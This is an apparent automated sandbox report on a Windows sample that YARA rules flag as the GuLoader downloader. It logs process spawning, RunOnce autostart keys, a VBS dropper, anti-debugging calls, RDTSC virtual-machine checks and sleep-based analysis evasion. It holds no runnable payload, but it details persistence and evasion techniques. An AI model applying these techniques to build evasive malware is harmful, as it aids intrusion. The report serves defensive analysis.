Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: ___ __ ___.exeVirustotal: Detection: 20%
Source: ___ __ ___.exeReversingLabs: Detection: 34%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeFile read: C:\Users\user\Desktop\___ __ ___.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
Source: unknownProcess created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: unknownProcess created: C:\Windows\System32\audiodg.exe C:\Windows\System32\audiodg.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: unknownProcess created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: unknownProcess created: C:\Windows\System32\msdt.exe C:\Windows\System32\msdt.exe
Source: C:\Users\user\Desktop\___ __ ___.exeProcess created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe' Jump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exeJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\System32\msiexec.exeFile written: C:\Users\user\AppData\Roaming\KP8PBRSW\KP8logri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\RutfJump to behavior
Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\Rutf\IconCache-ze.exeJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: msiexec.pdb source: filename1.exe, 00000005.00000002.1133347887.00090000.00000040.00000001.sdmp
Source: Binary string: AudioDG.pdb source: filename1.exe, 00000007.00000002.1159119849.00060000.00000040.00000001.sdmp
Source: Binary string: ntdll.pdb source: filename1.exe, msdt.exe, 00000014.00000003.1440942034.016B0000.00000004.00000001.sdmp
Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: msiexec.exe, 0000000A.00000003.1406418600.02730000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 source: filename1.exe, 00000005.00000002.1137702614.1EC42000.00000040.00000001.sdmp, filename1.exe, 00000007.00000002.1162617724.1EF20000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000003.1134742152.01580000.00000004.00000001.sdmp, audiodg.exe, 0000000B.00000003.1158929724.011D0000.00000004.00000001.sdmp, filename1.exe, 00000011.00000002.1451115256.1EE12000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.1440942034.016B0000.00000004.00000001.sdmp
Source: Binary string: msdt.pdb source: filename1.exe, 00000011.00000002.1450781655.1EB90000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoaderShow sources
Source: Yara matchFile source: Process Memory Space: IconCache-ze.exe PID: 2584, type: MEMORY
Source: Yara matchFile source: Process Memory Space: filename1.exe PID: 2212, type: MEMORY
Source: Yara matchFile source: Process Memory Space: IconCache-ze.exe PID: 2744, type: MEMORY
Source: Yara matchFile source: Process Memory Space: filename1.exe PID: 2132, type: MEMORY
Source: Yara matchFile source: Process Memory Space: filename1.exe PID: 1508, type: MEMORY
Source: Yara matchFile source: Process Memory Space: filename1.exe PID: 660, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ___ __ ___.exe PID: 304, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ___ __ ___.exe PID: 1548, type: MEMORY
Source: Yara matchFile source: Process Memory Space: filename1.exe PID: 2860, type: MEMORY
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_0040125A push ebp; ret 0_2_0040123C
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_004088E5 push ebx; iretd 0_2_00408B8A
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_0040889F push ebx; iretd 0_2_00408B8A
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_0040118B push ebp; ret 0_2_0040123C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB2869 push ecx; ret 5_2_1EBB287C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF53671 push ds; iretd 7_2_1EF5367C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF5363A push ds; retf 7_2_1EF53670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF53615 push ds; retf 7_2_1EF53670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF72869 push ecx; ret 7_2_1EF7287C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF342AF push ds; ret 7_2_1EF342B7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED63671 push ds; iretd 17_2_1ED6367C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED63615 push ds; retf 17_2_1ED63670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED6363B push ds; retf 17_2_1ED63670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED82869 push ecx; ret 17_2_1ED8287C

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run KXF4ZPD06HJump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbsJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbsJump to behavior
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\System32\msiexec.exeRDTSC instruction interceptor: First address: 00077244 second address: 0007724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msiexec.exeRDTSC instruction interceptor: First address: 000774BE second address: 000774C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\audiodg.exeRDTSC instruction interceptor: First address: 00067244 second address: 0006724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\audiodg.exeRDTSC instruction interceptor: First address: 000674BE second address: 000674C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msdt.exeRDTSC instruction interceptor: First address: 000C7244 second address: 000C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msdt.exeRDTSC instruction interceptor: First address: 000C74BE second address: 000C74C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC31EFF rdtsc 5_2_1EC31EFF
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeAPI coverage: 8.6 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 1540Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2432Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2616Thread sleep time: -160000s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2500Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2536Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2844Thread sleep count: 36 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2844Thread sleep time: -2160000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debuggerShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E050D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000000_2_003E050D
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\___ __ ___.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files\Rutf\IconCache-ze.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread information set: HideFromDebuggerJump to behavior
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC31EFF rdtsc 5_2_1EC31EFF
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E2C69 mov eax, dword ptr fs:[00000030h]0_2_003E2C69
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E849C mov eax, dword ptr fs:[00000030h]0_2_003E849C
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E8CCF mov eax, dword ptr fs:[00000030h]0_2_003E8CCF
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E9B19 mov eax, dword ptr fs:[00000030h]0_2_003E9B19
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E4367 mov eax, dword ptr fs:[00000030h]0_2_003E4367
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E2B48 mov eax, dword ptr fs:[00000030h]0_2_003E2B48
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E1DA7 mov eax, dword ptr fs:[00000030h]0_2_003E1DA7
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E97C0 mov eax, dword ptr fs:[00000030h]0_2_003E97C0
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00152C69 mov eax, dword ptr fs:[00000030h]1_2_00152C69
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_0015849C mov eax, dword ptr fs:[00000030h]1_2_0015849C
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00158CCF mov eax, dword ptr fs:[00000030h]1_2_00158CCF
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00159B19 mov eax, dword ptr fs:[00000030h]1_2_00159B19
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00152B48 mov eax, dword ptr fs:[00000030h]1_2_00152B48
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00154367 mov eax, dword ptr fs:[00000030h]1_2_00154367
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00151DA7 mov eax, dword ptr fs:[00000030h]1_2_00151DA7
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_001597C0 mov eax, dword ptr fs:[00000030h]1_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E2C69 mov eax, dword ptr fs:[00000030h]2_2_003E2C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E849C mov eax, dword ptr fs:[00000030h]2_2_003E849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E8CCF mov eax, dword ptr fs:[00000030h]2_2_003E8CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E9B19 mov eax, dword ptr fs:[00000030h]2_2_003E9B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E4367 mov eax, dword ptr fs:[00000030h]2_2_003E4367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E2B48 mov eax, dword ptr fs:[00000030h]2_2_003E2B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E1DA7 mov eax, dword ptr fs:[00000030h]2_2_003E1DA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E97C0 mov eax, dword ptr fs:[00000030h]2_2_003E97C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00192C69 mov eax, dword ptr fs:[00000030h]4_2_00192C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019849C mov eax, dword ptr fs:[00000030h]4_2_0019849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00198CCF mov eax, dword ptr fs:[00000030h]4_2_00198CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00199B19 mov eax, dword ptr fs:[00000030h]4_2_00199B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00192B48 mov eax, dword ptr fs:[00000030h]4_2_00192B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00194367 mov eax, dword ptr fs:[00000030h]4_2_00194367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00191DA7 mov eax, dword ptr fs:[00000030h]4_2_00191DA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_001997C0 mov eax, dword ptr fs:[00000030h]4_2_001997C0
